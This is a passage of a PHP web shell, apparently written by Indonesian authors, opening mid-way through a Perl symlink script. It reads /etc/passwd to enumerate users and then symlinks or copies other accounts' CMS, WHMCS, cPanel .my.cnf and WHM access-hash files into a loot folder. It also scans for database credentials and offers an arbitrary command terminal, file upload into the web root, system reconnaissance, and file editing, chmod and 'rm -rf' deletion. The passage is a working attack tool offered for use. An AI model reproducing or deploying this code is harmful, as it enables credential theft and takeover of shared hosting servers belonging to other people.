symlink("/var/www/vhosts/$sitess/httpdocs/clientes/configuration.php", "$sitess-clientes.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cliente/configuration.php", "$sitess-cliente.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clientsupport/configuration.php", "$sitess-clientsupport.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/configuration.php", "$sitess-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/manage/configuration.php", "$sitess-whm-manage.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/my/configuration.php", "$sitess-whm-my.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/myshop/configuration.php", "$sitess-whm-myshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/dist-configure.php", "$sitess-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/zencart/includes/dist-configure.php", "$sitess-shop-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/dist-configure.php", "$sitess-shop-ZCshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Settings.php", "$sitess-smf.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/smf/Settings.php", "$sitess-smf2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/Settings.php", "$sitess-smf-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/Settings.php", "$sitess-smf-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/upload/includes/config.php", "$sitess-up.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/article/config.php", "$sitess-Nwahy.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/up/includes/config.php", "$sitess-up2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/conf_global.php", "$sitess-6.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/include/db.php", "$sitess-7.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/connect.php", "$sitess-PHP-Fusion.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/mk_conf.php", "$sitess-9.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sites/default/settings.php", "$sitess-Drupal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/member/configuration.php", "$sitess-1member.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/configuration.php", "$sitess-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/configuration.php", "$sitess-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/requires/config.php", "$sitess-AM4SS-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/includes/iso4217.php", "$sitess-hostbills-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/includes/iso4217.php", "$sitess-hostbills-client.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/includes/iso4217.php", "$sitess-hostbills-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/includes/iso4217.php", "$sitess-hostbills-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/includes/iso4217.php", "$sitess-hostbills-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/includes/iso4217.php", "$sitess-hostbills-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/includes/iso4217.php", "$sitess-hostbills-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/includes/iso4217.php", "$sitess-hostbills-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostings/includes/iso4217.php", "$sitess-hostbills-hostings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostbillincludes/iso4217.php", "$sitess-hostbills-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills-hostbill.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/app/etc/local.xml", "$sitess-Magento.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-Opencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/settings.inc.php", "$sitess-Prestashop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/lokomedia/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/slconfig.php", "$sitess-Sitelok.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/application/config/database.php", "$sitess-Ellislab.txt"); } } print "Location: ./\n\n";'; $vhost_file = $config_dir . "/vhost.cin"; @file_put_contents($vhost_file, $vhost_script); @chmod($vhost_file, 0755); echo '
vHosts Config Script Created: vhost.cin
This Perl script will create symlinks to configuration files
'; echo '
Open pbm_config Directory '; // Try to execute the script $output = @shell_exec("cd " . escapeshellarg($config_dir) . " && ./vhost.cin 2>&1"); if($output) { echo '
Script executed successfully!
Symlinks created in pbm_config directory
'; } else { echo '
Script ready to run. You can execute it manually from the directory.
'; } echo '
'; } else { // Jika tidak di vhosts, scan /etc/passwd untuk user echo '
Scanning /etc/passwd for user configurations...
'; $etc = @fopen("/etc/passwd", "r"); if(!$etc) { echo '
Error: Cannot read /etc/passwd
'; } else { $users_found = 0; $configs_found = 0; // Daftar konfigurasi yang akan di-scan $grab_config = array( // vBulletin "/home/USER/public_html/vb/includes/config.php" => "vBulletin1", "/home/USER/public_html/forum/includes/config.php" => "vBulletin3", "/home/USER/public_html/cc/includes/config.php" => "vBulletin4", "/home/USER/public_html/includes/config.php" => "vBulletin2", // WordPress "/home/USER/public_html/wp-config.php" => "Wordpress1", "/home/USER/public_html/blog/wp-config.php" => "Wordpress2", "/home/USER/public_html/wp/wp-config.php" => "WordPress", "/home/USER/public_html/wordpress/wp-config.php" => "WordPress", // Joomla "/home/USER/public_html/configuration.php" => "Joomla1", "/home/USER/public_html/blog/configuration.php" => "Joomla2", "/home/USER/public_html/joomla/configuration.php" => "Joomla3", "/home/USER/public_html/portal/configuration.php" => "joomla-portal", // WHMCS "/home/USER/public_html/whm/configuration.php" => "Whm1", "/home/USER/public_html/whmc/configuration.php" => "Whm2", "/home/USER/public_html/support/configuration.php" => "Whm3", "/home/USER/public_html/client/configuration.php" => "Whm4", "/home/USER/public_html/billings/configuration.php" => "Whm5", "/home/USER/public_html/billing/configuration.php" => "Whm6", "/home/USER/public_html/clients/configuration.php" => "Whm7", "/home/USER/public_html/whmcs/configuration.php" => "Whm8", "/home/USER/public_html/order/configuration.php" => "Whm9", // Other CMS "/home/USER/public_html/admin/conf.php" => "5", "/home/USER/public_html/admin/config.php" => "4", "/home/USER/public_html/conf_global.php" => "invisio", "/home/USER/public_html/include/db.php" => "7", "/home/USER/public_html/connect.php" => "8", "/home/USER/public_html/mk_conf.php" => "mk-portale1", "/home/USER/public_html/include/config.php" => "12", "/home/USER/public_html/settings.php" => "Smf", "/home/USER/public_html/includes/functions.php" => "phpbb3", // PopojiCMS "/home/USER/public_html/po-content/config.php" => "Popoji", // Voodoo "/home/USER/public_html/vdo_config.php" => "Voodoo", // BosWeb "/home/USER/public_html/bw-configs/config.ini" => "BosWeb", // Lokomedia "/home/USER/public_html/config/koneksi.php" => "Lokomedia", "/home/USER/public_html/lokomedia/config/koneksi.php" => "Lokomedia", // Drupal "/home/USER/public_html/sites/default/settings.php" => "Drupal", // PrestaShop "/home/USER/public_html/config/settings.inc.php" => "PrestaShop", // Magento "/home/USER/public_html/app/etc/local.xml" => "Magento", // OpenCart "/home/USER/public_html/admin/config.php" => "OpenCart", "/home/USER/public_html/config.php" => "OpenCart-config", // Sitelok "/home/USER/public_html/slconfig.php" => "Sitelok", // EllisLab (ExpressionEngine) "/home/USER/public_html/application/config/database.php" => "Ellislab", // CPanel/WHM "/home/USER/.my.cnf" => "cpanel", "/home/USER/.accesshash" => "WHM-accesshash" ); // Home directories 1-7 $home_dirs = ['', '2', '3', '4', '5', '6', '7']; echo '
'; while($passwd = @fgets($etc)) { if(preg_match('/^([^:]+):x:/', $passwd, $matches)) { $user_idx = $matches[1]; $users_found++; $user_configs_found = 0; foreach($home_dirs as $home_num) { $home_prefix = $home_num ? "home{$home_num}" : "home"; $user_config_dir = "/{$home_prefix}/{$user_idx}/public_html/"; if(is_readable("/{$home_prefix}/{$user_idx}/")) { foreach($grab_config as $config_pattern => $config_name) { $config_file = str_replace("USER", $user_idx, $config_pattern); $config_file = str_replace("/home/", "/{$home_prefix}/", $config_file); if(file_exists($config_file) && is_readable($config_file)) { $configs_found++; $user_configs_found++; // Save config to file $config_content = @file_get_contents($config_file); if($config_content !== false && trim($config_content) != '') { $output_file = $config_dir . "/{$user_idx}-{$config_name}.txt"; @file_put_contents($output_file, $config_content); echo ''; } } } } } // Jika tidak ada config yang ditemukan untuk user ini if($user_configs_found == 0) { echo ''; } } } @fclose($etc); echo '
User Config Found File Status
'.$user_idx.' '.$config_name.' '.htmlspecialchars(basename($config_file)).' Saved
'.$user_idx.' No configurations found
'; echo '
Scan Complete:
Users scanned: '.$users_found.'
Configurations found: '.$configs_found.'
Files saved to: pbm_config/
'; if($configs_found > 0) { echo '
Open pbm_config Directory ('.$configs_found.' files)
'; } } } // Quick Scan Options echo '
Quick CMS Scan
Database Config Scanner
'; // Handle quick CMS scan if(isset($_POST['quick_cms_scan'])) { $scan_dir = $_POST['scan_cms_dir']; $cms_types = $_POST['cms_types'] ?? []; echo '
Quick CMS Scan Results:
'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $cms_patterns = []; if(in_array('wordpress', $cms_types)) { $cms_patterns['WordPress'] = ['wp-config.php']; } if(in_array('joomla', $cms_types)) { $cms_patterns['Joomla'] = ['configuration.php']; } if(in_array('drupal', $cms_types)) { $cms_patterns['Drupal'] = ['sites/default/settings.php']; } if(in_array('vbulletin', $cms_types)) { $cms_patterns['vBulletin'] = ['includes/config.php']; } if(in_array('whmcs', $cms_types)) { $cms_patterns['WHMCS'] = ['configuration.php']; } $found_cms = []; // Recursive scan function function scanForCMS($dir, $patterns, &$found, $depth = 0, $max_depth = 3) { if($depth >= $max_depth) return; if(!is_dir($dir) || !is_readable($dir)) return; $items = @scandir($dir); if(!$items) return; foreach($items as $item) { if($item == '.' || $item == '..') continue; $path = $dir . '/' . $item; if(is_dir($path)) { scanForCMS($path, $patterns, $found, $depth + 1, $max_depth); } elseif(is_file($path)) { foreach($patterns as $cms_name => $cms_files) { foreach($cms_files as $cms_file) { if(basename($path) == $cms_file) { $found[] = [ 'cms' => $cms_name, 'file' => $path, 'dir' => dirname($path) ]; } } } } } } scanForCMS($scan_dir, $cms_patterns, $found_cms); if(!empty($found_cms)) { echo '
Found '.count($found_cms).' CMS configuration files
'; foreach($found_cms as $cms) { echo ''; } echo '
CMS Config File Directory Actions
'.$cms['cms'].' '.htmlspecialchars(basename($cms['file'])).' '.$cms['dir'].' View Open
'; } else { echo '
No CMS configuration files found in the specified directory
'; } } else { echo '
Cannot read directory: '.$scan_dir.'
'; } echo '
'; } // Handle database config scan if(isset($_POST['scan_db_configs'])) { $search_type = $_POST['db_search_type']; echo '
Database Config Scan Results:
'; // Patterns for database configs $db_patterns = [ 'wp-config.php' => 'WordPress', 'configuration.php' => 'Joomla', 'settings.php' => 'Drupal', 'config.php' => 'General Config', '.env' => 'Environment', 'database.php' => 'Laravel/CodeIgniter', 'local.xml' => 'Magento', 'settings.inc.php' => 'PrestaShop' ]; // Filter based on search type $filtered_patterns = []; switch($search_type) { case 'wp': $filtered_patterns = ['wp-config.php' => 'WordPress']; break; case 'joomla': $filtered_patterns = ['configuration.php' => 'Joomla']; break; case 'config': $filtered_patterns = ['config.php' => 'General Config', 'configuration.php' => 'Joomla']; break; case 'env': $filtered_patterns = ['.env' => 'Environment']; break; default: $filtered_patterns = $db_patterns; } // Search in common locations $common_locations = [ $dir, '/home', '/var/www', '/var/www/html', '/usr/local/apache2/htdocs' ]; $found_db_configs = []; foreach($common_locations as $location) { if(is_dir($location) && is_readable($location)) { foreach($filtered_patterns as $file_pattern => $file_type) { $command = "find " . escapeshellarg($location) . " -name '" . $file_pattern . "' -type f 2>/dev/null | head -20"; $files = @shell_exec($command); if($files) { $file_list = explode("\n", trim($files)); foreach($file_list as $file) { if(!empty($file) && file_exists($file)) { $content = @file_get_contents($file); if($content && (preg_match('/DB_HOST|dbname|database|localhost|127.0.0.1/i', $content) || preg_match('/define.*DB_|mysql_connect|mysqli_connect/i', $content))) { $found_db_configs[] = [ 'file' => $file, 'type' => $file_type, 'dir' => dirname($file), 'has_db' => true ]; } } } } } } } if(!empty($found_db_configs)) { echo '
Found '.count($found_db_configs).' database configuration files
'; foreach($found_db_configs as $db_config) { // Try to extract database info $content = @file_get_contents($db_config['file']); $db_info = 'Not found'; if($content) { if(preg_match('/define.*[\'"]DB_NAME[\'"].*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/[\'"]database[\'"]\s*=>\s*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/dbname=([^;]+)/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } } echo ''; } echo '
Type File Directory DB Info Actions
'.$db_config['type'].' '.htmlspecialchars(basename($db_config['file'])).' '.$db_config['dir'].' '.$db_info.' View Open
'; } else { echo '
No database configuration files found
'; } echo '
'; } echo '
'; } // Tab Archive Tools - DIPERBAIKI (Detect Archive di current dir) elseif($_GET['do'] == 'archive') { echo '
Archive Tools
'; // Detect archive files in current directory $archive_files = detectArchiveFiles($dir); if(!empty($archive_files)) { echo '
Archive Files Found in Current Directory:
'; foreach($archive_files as $archive) { $ext_badge = ''; switch($archive['ext']) { case 'zip': $ext_badge = 'bg-success'; break; case 'tar': $ext_badge = 'bg-primary'; break; case 'gz': $ext_badge = 'bg-warning'; break; case 'bz2': $ext_badge = 'bg-danger'; break; case 'rar': $ext_badge = 'bg-info'; break; default: $ext_badge = 'bg-secondary'; } echo ''; } echo '
File Name Type Size Actions
'.$archive['name'].' .'.$archive['ext'].' '.$archive['size'].'
Download
'; } else { echo '
No archive files found in current directory
'; } echo '
'; // Archive Operations echo '
Extract Archive
Supported: .zip, .tar, .tar.gz, .tar.bz2, .rar
'; if(isset($_POST['do_extract'])) { $extract_to = $_POST['extract_path'] ?: $dir; if(isset($_FILES['archive_file']) && $_FILES['archive_file']['error'] == 0) { $tmp_file = $_FILES['archive_file']['tmp_name']; $orig_name = $_FILES['archive_file']['name']; $target_file = sys_get_temp_dir() . '/' . $orig_name; if(move_uploaded_file($tmp_file, $target_file)) { if(unarchiveFile($target_file, $extract_to)) { echo '
Archive extracted successfully to '.$extract_to.'
'; } else { echo '
Failed to extract archive. Make sure the file format is supported.
'; } @unlink($target_file); } } elseif(!empty($_POST['existing_archive'])) { $archive_file = $_POST['existing_archive']; if(file_exists($archive_file) && is_readable($archive_file)) { if(unarchiveFile($archive_file, $extract_to)) { echo '
Archive extracted successfully to '.$extract_to.'
'; } else { echo '
Failed to extract archive. Make sure the file format is supported.
'; } } else { echo '
Archive file not found or not readable: '.$archive_file.'
'; } } else { echo '
Please select an archive file or enter a path
'; } } // Handle extract from detected archives if(isset($_POST['extract_archive'])) { $archive_file = $_POST['archive_file']; $extract_to = $dir; if(unarchiveFile($archive_file, $extract_to)) { echo '
Archive extracted successfully to '.$extract_to.'
'; } else { echo '
Failed to extract archive
'; } } echo '
'; // Create Archive echo '
Create Archive
'; if(isset($_POST['create_archive'])) { $archive_dir = $_POST['archive_dir']; $archive_name = $_POST['archive_name']; $archive_type = $_POST['archive_type']; $archive_path = $dir . '/' . $archive_name; if(is_dir($archive_dir) && is_readable($archive_dir)) { // Untuk ZIP if($archive_type == 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if($zip->open($archive_path, ZipArchive::CREATE) === TRUE) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($archive_dir), RecursiveIteratorIterator::LEAVES_ONLY ); foreach($files as $file) { if(!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($archive_dir) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); echo '
Archive created successfully: '.$archive_path.'
Size: '.formatSize($archive_path).'
'; } else { echo '
Failed to create ZIP archive
'; } } else { echo '
ZIP creation requires ZipArchive class. Try using shell commands instead.
'; } } else { echo '
Directory not found or not readable: '.$archive_dir.'
'; } } // Check archive support echo '
Archive Support Status:
ZipArchive Class: '.(class_exists('ZipArchive') ? 'Available' : 'Not Available').'
PharData Class: '.(class_exists('PharData') ? 'Available' : 'Not Available').'
Shell Exec for tar/zip: '.(function_exists('shell_exec') ? 'Available' : 'Limited').'
'; echo '
'; } // Tab System Info - DIPERBAIKI (Network Info) elseif($_GET['do'] == 'system') { $php_version = PHP_VERSION; $safe_mode = (@ini_get("safe_mode") == 'on') ? checkStatus(false) : checkStatus(true); $magic_quotes = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) ? checkStatus(true) : checkStatus(false); $mysql = (function_exists('mysqli_connect')) ? checkStatus(true) : checkStatus(false); $exec = (function_exists('exec')) ? checkStatus(true) : checkStatus(false); $open_basedir = (ini_get("open_basedir")) ? checkStatus(true) : checkStatus(false); $symlink = (function_exists('symlink')) ? checkStatus(true) : checkStatus(false); echo '
System Information
'; // Basic Info Column echo '
Basic Info
OS'.$os.'
Kernel'.$kernel.'
Server Software'.$_SERVER['SERVER_SOFTWARE'].'
PHP Version'.$php_version.'
Document Root'.$_SERVER['DOCUMENT_ROOT'].'
'; // PHP Features Column echo '
PHP Features
Safe Mode'.$safe_mode.'
Magic Quotes'.$magic_quotes.'
Open Basedir'.$open_basedir.'
Exec Function'.$exec.'
Symlink'.$symlink.'
MySQL Support'.$mysql.'
'; // Tools Column echo '
Available Tools
cURL'.$curl.'
Wget'.$wget.'
Perl'.$perl.'
Python'.$python.'
Disk Space Free'.$freespace.'
Disk Space Total'.$total.'
'; // Network Column - DIPERBAIKI echo '
Network Info
Server IP'.'Server IP - '.$server_ip.' {'.$_SERVER['REMOTE_ADDR'].'}
Your IP'.$ip_user.'
Hostname'.gethostname().'
User Agent'.$_SERVER['HTTP_USER_AGENT'].'
Disabled Functions:
'; echo '
'; // OS Specific Information if ($os == 'Windows') { echo '
Windows Information
'; $account_settings = exe('net accounts'); $account_user = exe('net user'); echo '
User Accounts
'.$account_user.'
'; echo '
System Accounts
'.$account_settings.'
'; echo '
'; } if ($os == 'Linux') { echo '
Linux Information
'; $hdd_space = exe('df -h'); $hosts = exe('cat /etc/hosts'); echo '
Disk Usage
'.$hdd_space.'
System Info
'; if (is_readable('/etc/passwd')) { echo ''; } else { echo ''; } echo '
Distribution'.exe('cat /etc/issue').'
Current User'.exe('whoami').'
Hosts FileView /etc/passwdNot Readable
'; } } // ========== TAB-TAB LAINNYA ========== // Tab Upload (dari kode asli) elseif($_GET['do'] == 'upload') { echo '
File Upload
'; if(isset($_POST['upload'])) { echo '
'; if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { echo '
Uploaded to: '.$dir.'/'.$_FILES['ix_file']['name'].'
'; } else { echo '
Failed to upload file
'; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { echo '
Uploaded to: '.$root.'
Open: http://'.$web.'
'; } else { echo '
Failed to upload file
'; } } else { echo '
Document root is not writable
'; } } echo '
'; } echo '
'; } // Tab Command Terminal (dari kode asli) elseif($_GET['do'] == 'cmd') { echo '
Terminal
'; if(isset($_POST['do_cmd'])) { echo '
'.exe($_POST['cmd']).'
'; } // Quick commands echo '
Quick Commands:
whoami pwd ls -la uname -a php -v
'; } // Tab Recursive Scan (dari kode asli) elseif($_GET['do'] == 'scan') { echo '
Recursive Directory Scanner
'; echo '
'; if(isset($_POST['do_scan'])) { $scan_dir = $_POST['scan_dir']; $extensions = array_map('trim', explode(',', $_POST['scan_ext'])); $extensions = array_filter($extensions); $max_depth = intval($_POST['scan_depth']); echo '
Scanning directory: '.$scan_dir.'
Extensions: '.($extensions ? implode(', ', $extensions) : 'All files').' | Max Depth: '.$max_depth.'
'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $start_time = microtime(true); $files = recursiveScan($scan_dir, $extensions, $max_depth); $end_time = microtime(true); $scan_time = round($end_time - $start_time, 3); echo '
Found '.count($files).' files in '.$scan_time.' seconds
'; if(!empty($files)) { echo '
'; $counter = 1; foreach ($files as $file) { if($counter > 100) { // Limit display to 100 files echo ''; break; } $size = formatSize($file); $dir_path = dirname($file); echo ''; $counter++; } echo '
# File Path Size Actions
... and '.(count($files) - 100).' more files
'.$counter.' '.$file.' '.$size.'
'; // Export options echo '
Export Results:
'; } } else { echo '
Cannot read directory: '.$scan_dir.'
'; } } // Handle export if(isset($_POST['export_txt'])) { $files = unserialize($_POST['export_files']); $export_content = "Recursive Scan Results\n"; $export_content .= "Date: ".date('Y-m-d H:i:s')."\n"; $export_content .= "Directory: ".$_POST['scan_dir']."\n"; $export_content .= "Files Found: ".count($files)."\n\n"; foreach ($files as $index => $file) { $export_content .= ($index+1).". ".$file."\n"; } header('Content-Type: text/plain'); header('Content-Disposition: attachment; filename="scan_results_'.date('Ymd_His').'.txt"'); echo $export_content; exit; } echo '
'; } // ========== FILE MANAGER DAN OPERASI FILE LAINNYA ========== // Current Directory Navigation (untuk semua halaman kecuali yang sudah di-handle) elseif(!in_array($_GET['do'] ?? '', ['home', 'fileops', 'jumping', 'grab', 'scan', 'archive', 'system', 'upload', 'cmd'])) { // Handle file operations dari kode asli if (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'download') { $file = basename($_GET['file']); $filePath = __DIR__ . '/' . $file; if (file_exists($filePath)) { ob_end_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($filePath) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; } else { die("
Error: File tidak ditemukan!
"); } } elseif(isset($_GET['act']) && $_GET['act'] == 'newfile') { if(isset($_POST['new_save_file'])) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } echo $act; } echo '

Buat File Baru

'; } elseif(isset($_GET['act']) && $_GET['act'] == 'newfolder') { if(isset($_POST['new_save_folder'])) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } echo $act; } echo '

Buat Folder Baru

'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename_dir') { if(isset($_POST['dir_rename'])) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo '

Ubah Nama Folder

'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete_dir') { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $act = ""; } else { $act = "could not remove ".basename($dir).""; } } echo $act; } elseif(isset($_GET['act']) && $_GET['act'] == 'view') { echo '

File: ' . htmlspecialchars(basename($_GET['file'])) . '

View Edit Rename Download Delete
'; } elseif (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'chmod_file') { $file = $_GET['file']; $dir = $_GET['dir'] ?? dirname($file); $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Ambil permission saat ini dalam format oktal if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { // Validasi izin harus dalam format oktal 3 digit $chmod_result = chmod($file, octdec($new_perm)); $msg = $chmod_result ? "✅ Permission berhasil diubah menjadi $new_perm!" : "❌ Gagal mengubah permission!"; $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Update permission setelah chmod } else { $msg = "❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755)."; } } echo '
'; echo '

🛠 Ganti Permission (chmod) File

'; echo isset($msg) ? "

$msg

" : ""; echo '

📂 File: ' . htmlspecialchars($file) . '

'; echo '

📍 Path: ' . htmlspecialchars($dir) . '

'; echo '

🔑 Permission Saat Ini: ' . $current_perm . '

'; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo '
🔙 Kembali'; echo '
'; } elseif (isset($_GET['dir']) && !empty($_GET['dir']) && isset($_GET['act']) && $_GET['act'] == 'chmod_dir') { $dir = $_GET['dir']; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { $chmod_result = chmod($dir, octdec($new_perm)); $msg = $chmod_result ? "✅ Permission berhasil diubah menjadi $new_perm!" : "❌ Gagal mengubah permission!"; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); } else { $msg = "❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755)."; } } echo '
'; echo '

🛠 Ganti Permission (chmod) Direktori

'; echo isset($msg) ? "

$msg

" : ""; echo '

📂 Direktori: ' . htmlspecialchars($dir) . '

'; echo '

🔑 Permission Saat Ini: ' . $current_perm . '

'; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo '
🔙 Kembali'; echo '
'; } elseif(isset($_GET['act']) && $_GET['act'] == 'edit') { if (isset($_POST['save'])) { $save = file_put_contents($_GET['file'], $_POST['src']); if ($save) { $act = ''; } else { $act = ''; } echo $act; } echo '

File: ' . htmlspecialchars(basename($_GET['file'])) . '

View Edit Rename Download Delete
'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename') { if (isset($_POST['do_rename'])) { $new_name = htmlspecialchars($_POST['rename']); $rename = rename($_GET['file'], "$dir/$new_name"); if ($rename) { echo ""; exit; } else { echo ''; } } echo '

Rename File

View Edit Rename Download Delete
'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; } // File Manager (Default View) else { // Current Directory Navigation echo '
'; echo '
New File New Folder '.w($dir, perms($dir)).'
'; echo '
File Manager
'.count(glob("$dir/*")).' items
'; if(is_dir($dir) && is_readable($dir)) { echo ''; // Parent directory link if($dir != "/") { $parent = dirname($dir); echo ''; } $scandir = scandir($dir); $folders = []; $files = []; foreach($scandir as $item) { if($item == '.' || $item == '..') continue; if(is_dir("$dir/$item")) { $folders[] = $item; } else { $files[] = $item; } } // Display folders first foreach($folders as $folder) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$folder")); echo ''; } // Display files foreach($files as $file) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$file")); $size = formatSize("$dir/$file"); $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Set icon based on file extension $icon = 'bi-file-earmark'; $color = 'text-info'; if(in_array($ext, ['php', 'html', 'htm', 'js', 'css'])) { $icon = 'bi-file-code'; $color = 'text-success'; } elseif(in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'bmp'])) { $icon = 'bi-file-image'; $color = 'text-warning'; } elseif(in_array($ext, ['zip', 'rar', 'tar', 'gz'])) { $icon = 'bi-file-zip'; $color = 'text-danger'; } echo ''; } echo '
Name Size Modified Permissions Actions
Parent Directory
'.$folder.' DIR '.$ftime.' '.w("$dir/$folder", perms("$dir/$folder")).'
'.$file.' '.$size.' '.$ftime.' '.w("$dir/$file", perms("$dir/$file")).'
'; } else { echo '
Cannot open directory. (Not readable)
'; } echo '
'; } } // Logout Handler if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; } // Footer echo ''; echo ''; // Close container ?>